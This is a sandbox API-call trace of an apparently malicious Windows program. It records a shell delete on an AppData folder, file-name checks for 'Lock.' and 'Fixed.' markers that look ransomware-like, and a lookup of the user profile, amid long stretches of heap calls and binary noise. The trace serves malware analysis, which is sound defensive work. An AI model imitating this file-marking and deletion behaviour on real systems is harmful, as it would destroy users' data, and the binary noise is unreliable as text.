䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Roaming\\Sun", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 0 [0151.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0151.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0151.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0151.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0151.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0151.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0151.585] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0151.585] TranslateMessage (lpMsg=0x8cf968) returned 0 [0151.585] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0151.585] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0151.585] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0151.585] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0151.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0151.585] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0151.585] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0151.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0151.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0151.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0151.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0151.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0151.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0151.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0151.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0151.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0151.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0151.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0151.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0151.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0151.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UGbEnsFdWrF0NcSzWk2.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0151.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GbEnsFdWrF0NcSzWk2.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0151.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bEnsFdWrF0NcSzWk2.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0151.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EnsFdWrF0NcSzWk2.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0151.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nsFdWrF0NcSzWk2.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0151.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sFdWrF0NcSzWk2.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0151.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FdWrF0NcSzWk2.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0151.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dWrF0NcSzWk2.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0151.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WrF0NcSzWk2.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0151.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rF0NcSzWk2.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0151.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F0NcSzWk2.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0151.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0NcSzWk2.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0151.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NcSzWk2.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0151.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cSzWk2.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0151.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SzWk2.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0151.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zWk2.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0151.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Wk2.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0151.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k2.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0151.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0151.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0151.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0151.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0151.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0151.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0151.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0151.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0151.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0151.587] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0151.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0151.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0151.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0151.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0151.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0151.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0151.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0151.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0151.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0151.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0151.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0151.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0151.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0151.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0151.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0151.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0151.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0151.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0151.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa61b0 [0151.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0151.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UGbEnsFdWrF0NcSzWk2.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0151.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GbEnsFdWrF0NcSzWk2.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0151.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bEnsFdWrF0NcSzWk2.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0151.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EnsFdWrF0NcSzWk2.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0151.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nsFdWrF0NcSzWk2.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0151.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sFdWrF0NcSzWk2.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0151.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FdWrF0NcSzWk2.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0151.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dWrF0NcSzWk2.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0151.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WrF0NcSzWk2.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0151.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rF0NcSzWk2.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0151.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F0NcSzWk2.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0151.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0NcSzWk2.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0151.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NcSzWk2.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0151.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cSzWk2.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0151.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SzWk2.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0151.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zWk2.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0151.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Wk2.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0151.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k2.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0151.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0151.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa66f0 [0151.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0151.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa66f0 | out: hHeap=0x2af0000) returned 1 [0151.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0151.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0151.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0151.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0151.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0151.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0151.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0151.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0151.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0151.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0151.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0151.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0151.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0151.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0151.588] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0151.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0151.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0151.589] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0151.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0151.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0151.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0151.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b98 [0151.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0151.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0151.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0151.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0151.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0151.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0151.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0151.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0151.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0151.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0151.589] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0151.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0151.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0151.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92c8 [0151.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0151.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0151.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90b8 [0151.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0151.589] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0151.589] RtlAllocateHeap 